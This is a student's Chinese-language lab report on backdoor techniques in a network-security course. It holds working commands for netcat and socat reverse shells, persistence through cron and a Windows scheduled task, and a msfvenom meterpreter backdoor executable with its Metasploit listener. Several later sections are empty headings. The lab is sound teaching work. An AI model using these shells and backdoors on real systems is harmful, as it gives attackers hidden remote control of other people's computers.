2019-2020-3 20174314王方正《网络对抗技术》Exp2 后门原理与实践

一、实验概述

1.1 实验目标

掌握后门的概念,知道常见的后门种类,深入理解后门的运作原理。

掌握几种常见的后门工具,学会利用后门工具进行一些简单操作。

增强信息安全意识,认识到后门的危害性,提高对后门的防范意识。

1.2 实验内容

使用Netcat获取主机操作 Shell,cron 启动

使用socat获取主机操作Shell,任务计划启动

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

二、实验准备

2.1 软件下载

https://gitee.com/wildlinux/NetSec/attach_files中,可以下载本次实验所需的ncat.rar和socat.rar。

将压缩包解压,放到指定的位置,即完成“安装”。

2.2 查询IP地址

在PC中的cmd中,使用ipconfig指令,得知PC机IP地址为192.168.1.194。

 在Kali中打开终端,输入ip add,得知Kali端IP地址为192.168.133.130。

2.3 Win获得Linux Shell

在PC端打开cmd,输ncat -l -p 4314

在Kali端打开终端,输入nc 192.168.1.194 4314 -e /bin/sh

返回PC端,发现PC端成功攻击Kali端,输入ls测试,可以读取到Kali端的目录。

说明:PC端通过netcat对本机的4314端口进行监听,Kali端反弹连接PC端,若连接成功则执行命令行,故连接成功时PC端可以读取Kali端的目录。

2.4 Linux获得Windows Shell

在Kali端打开终端,输入nc -l -p 4314。

在PC端打开cmd,输入ncat -e cmd.exe 192.168.133.130 4314。

 返回Kali端,发现Kali端成功攻击PC端。

说明:Kali端通过nc指令对本机的4314端口进行监听,PC端反弹连接Kali端,如果连接成功则打开cmd,故连接成功时可以执行cmd。

2.5 netcat传输数据

在PC输入ncat -l 4314。

在Kali端输入192.168.1.194 4314。

稍后,连接成功,双方即可以相互通信。

说明:通过监听建立连接后,双方即可以开始通信。

2.6 netcat传输文件

在PC端输入ncat -l 4314 > 20174314.txt。

在Kali端输入nc 192.168.1.194 4314 < PC_to_Kali.out。

即可在Kali端查询到PC端传输的文件。

在Kali端输入nc -l 4314 > 20174314.txt。

在PC端输入ncat 192.168.133.130 4314 < Kali_to_PC.out。

即可在PC端查询到Kali端传输的文件。

说明:通过netcat可以进行文件的传输,需要注意的是,发方必须文件在对应目录,同时文件必须存在,而收方的文件名称甚至后缀都可以自行定义,并且自动生成。

三、实验步骤

3.1 使用 Netcat 获取主机操作 Shell ,cron 启动

Step1

在PC端,输入ncat -l -p 4314,回车。

在Kali端,输入crontab -e,回车,选择5,回车。

在Kali端,按i,在最后一行添加43 * * * * /bin/netcat 192.168.1.194 4314 -e /bin/sh,回车。

之后,于任意小时内的42分,返回PC端,即可看到PC端获取了Kali端的Shell。

说明:进入crontab,设置定时任务。设置为每年、每月、每天、每小时的42分时,执行命令行指令。仿照之前的,设定时间一到,即可获取目标Shell。

3.2 使用socat获取主机操作Shell,任务计划启动

Step1

在PC端,Win+R输入compmgmt.msc。

Step2

打开【计算机管理】-【系统工具】-【任务计划程序】-【创建任务】

Step3

打开【创建任务】-【触发器】-【新建...】。

Step4

设置【开始任务】为【工作站锁定时】。

Step5

打开【操作】-【新建...】。

Step6

将【操作】设置为【启动程序】。

将【程序或脚本】设置为socat的保存路径,此处设置为【C:\Users\86137\socat.exe】。

将【添加参数】设置为【tcp-listen:4314 exec:cmd.exe,pty,stderr】。

说明:利用socat工具获取PC端的Shell,故此处填写socat的路径。相关参数将cmd与4314端口绑定,同时把cmdstderr重定向到stdout上。

Step7

打开【任务计划程序】-【任务计划程序库】。

说明:至此即完成新的定时任务的设定,接下来触发条件即可控制PC端。

Step8

在PC端,锁定计算机,再启动计算机。

说明:此处会弹出一个cmd窗口,意味着socat程序开始执行了。

Step9

在Kali端,输入socat - tcp:192.168.1.194:4314。

说明:执行socat,连接到PC端的4314端口,成功获得cmd Shell。

3.3 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

Step1

在Kali端,输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.130 LPORT=4314 -f exe > backdoor_20174314.exe,回车。

在PC端,输入ncat.exe -lv 4314 > backdoor_20174314.exe,回车。

在Kali端,输入nc 192.168.1.194 4314 < backdoor_20174314.exe,回车。

说明:在Kali内生成后门程序,并将Kali端设置为控制端。在PC端开启文件接受模式,并在Kali端传输文件,即完成将后门文件置入PC端。

Step2

在Kali端,输入msfconsole,回车。

在Kali端,输入use exploit/multi/handler,回车。

在Kali端,输入set payload windows/meterpreter/reverse_tcp,回车。

在Kali端,输入set LHOST 192.168.133.130,回车。

在Kali端,输入set LPORT 4314,回车。

说明:进入msf控制到,使用监听模块,将payload设置为和之前生成后门程序相同的payload,然后指定Kali端的IP和端口号。

Step3

在Kali端,输入exploit,回车。

在PC端,输入backdoor_20174314.exe。

3.4 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

3.5 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

 四、实验错误分析

4.1 netcat无法运行

4.2

4.3 计算机摄像机损坏

4.4

4.5 进程无法访问

五、实验收获感想

5.1 实验问题回答

5.1.1 例举你能想到的一个后门进入到你系统中的可能方式?
 
5.1.2 例举你知道的后门如何启动起来(win及linux)的方式?
 
5.1.3 Meterpreter有哪些给你映像深刻的功能?
5.1.4 如何发现自己有系统有没有被安装后门?

5.2 我的感想

------------恢复内容结束------------

猜你喜欢

转载自www.cnblogs.com/wangfangzheng20174314/p/12549699.html
今日推荐